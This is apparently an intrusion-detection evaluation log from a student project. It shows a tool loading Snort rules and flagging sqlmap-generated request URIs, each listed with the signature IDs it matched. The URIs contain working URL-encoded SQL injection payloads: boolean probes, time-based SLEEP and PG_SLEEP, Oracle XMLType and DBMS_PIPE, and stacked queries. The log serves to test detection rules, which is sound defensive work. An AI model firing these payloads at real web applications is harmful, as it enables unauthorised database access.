# inspectorlog v3.5
#----- Initializing Rules (SNORT) ---------------------
# Rules directory : "/home/kali/Downloads/reglas_javi/snort"
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-sn-20220324.rules... done
#		Rules: read [3749], erroneous [0], URI [384]
#	Opening SNORT rule file /home/kali/Downloads/reglas_javi/snort/http_uri-er-20220224.rules... done
[parse_snortRule] WARNING: Line [4970] exceeds allowed number of PCRE fields
#		Rules: read [6015], erroneous [0], URI [5116]
#----- Statistics (SNORT) ------------------------------
# Read [9764] Snort rules, [5500] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l sqlmap.short -r /home/kali/Downloads/reglas_javi/snort -t list -o /home/kali/TFG/ficheros_uris_completos/web_estatica//snort/sqlmap_short.clean
Packet [1]	Uri [/%28SELECT%20%28CASE%20WHEN%20%282301%3D9296%29%20THEN%20%27web%27%20ELSE%20%28SELECT%209296%20UNION%20SELECT%204642%29%20END%29%29]	Nattacks [1]	Signatures	[2006446]
Packet [2]	Uri [/%28SELECT%20%28CASE%20WHEN%20%282507%3D2507%29%20THEN%20%27web%27%20ELSE%20%28SELECT%207576%20UNION%20SELECT%204809%29%20END%29%29]	Nattacks [1]	Signatures	[2006446]
Packet [3]	Uri [/%28SELECT%20CONCAT%28CONCAT%28%27qzxqq%27%2C%28CASE%20WHEN%20%287101%3D7101%29%20THEN%20%271%27%20ELSE%20%270%27%20END%29%29%2C%27qzbjq%27%29%29]	Nattacks [1]	Signatures	[2011042]
Packet [5]	Uri [/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%280%29%29%29hPlB%29]	Nattacks [2]	Signatures	[2006445]	[2016935]
Packet [6]	Uri [/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29]	Nattacks [2]	Signatures	[2006445]	[2016935]
Packet [7]	Uri [/web%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29--%20ejTC]	Nattacks [2]	Signatures	[2006445]	[2016935]
Packet [18]	Uri [/web%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29]	Nattacks [1]	Signatures	[2006445]
Packet [19]	Uri [/web%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29--%20DQkT]	Nattacks [1]	Signatures	[2006445]
Packet [20]	Uri [/web%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29]	Nattacks [1]	Signatures	[2006445]
Packet [21]	Uri [/web%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20Bqrf]	Nattacks [1]	Signatures	[2006445]
Packet [28]	Uri [/web%27%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%27LTUN%27%3D%27LTUN]	Nattacks [2]	Signatures	[2006445]	[2016935]
Packet [34]	Uri [/web%27%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29%20AND%20%27pcaP%27%3D%27pcaP]	Nattacks [1]	Signatures	[2006445]
Packet [35]	Uri [/web%27%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27jNQG%27%3D%27jNQG]	Nattacks [1]	Signatures	[2006445]
Packet [39]	Uri [/web%27%29%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%28%27JdTr%27%3D%27JdTr]	Nattacks [2]	Signatures	[2006445]	[2016935]
Packet [44]	Uri [/web%27%29%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27bIug%27%3D%27bIug]	Nattacks [1]	Signatures	[2006445]
Packet [46]	Uri [/web%27%29%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27pUda%27%3D%27pUda]	Nattacks [1]	Signatures	[2006445]
Packet [50]	Uri [/web%27%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [2]	Signatures	[19438]	[2006445]
Packet [51]	Uri [/web%27%29%3BSELECT%20PG_SLEEP%285%29--]	Nattacks [1]	Signatures	[19438]
Packet [53]	Uri [/web%27%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [2]	Signatures	[19438]	[2006445]
Packet [54]	Uri [/web%27%3BSELECT%20PG_SLEEP%285%29--]	Nattacks [1]	Signatures	[19438]
Packet [57]	Uri [/web%29%20AND%20%28SELECT%205091%20FROM%20%28SELECT%28SLEEP%285%29%29%29hPlB%29%20AND%20%289253%3D9253]	Nattacks [2]	Signatures	[2006445]	[2016935]
Packet [63]	Uri [/web%29%20AND%207068%3D%28SELECT%207068%20FROM%20PG_SLEEP%285%29%29%20AND%20%281073%3D1073]	Nattacks [1]	Signatures	[2006445]
Packet [64]	Uri [/web%29%20AND%209290%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%289290%3D9290%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28122%29%7C%7CCHR%2898%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%282327%3D2327]	Nattacks [1]	Signatures	[2006445]
Packet [68]	Uri [/web%29%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [2]	Signatures	[19438]	[2006445]
Packet [69]	Uri [/web%29%3BSELECT%20PG_SLEEP%285%29--]	Nattacks [1]	Signatures	[19438]
Packet [71]	Uri [/web%3BSELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28120%29%7C%7CCHR%2886%29%7C%7CCHR%2882%29%7C%7CCHR%2898%29%2C5%29%20FROM%20DUAL--]	Nattacks [2]	Signatures	[19438]	[2006445]
Packet [72]	Uri [/web%3BSELECT%20PG_SLEEP%285%29--]	Nattacks [1]	Signatures	[19438]
# N. packets [75], [27] with alerts, N. Alerts [37]
# Execution time: 0.416003 s
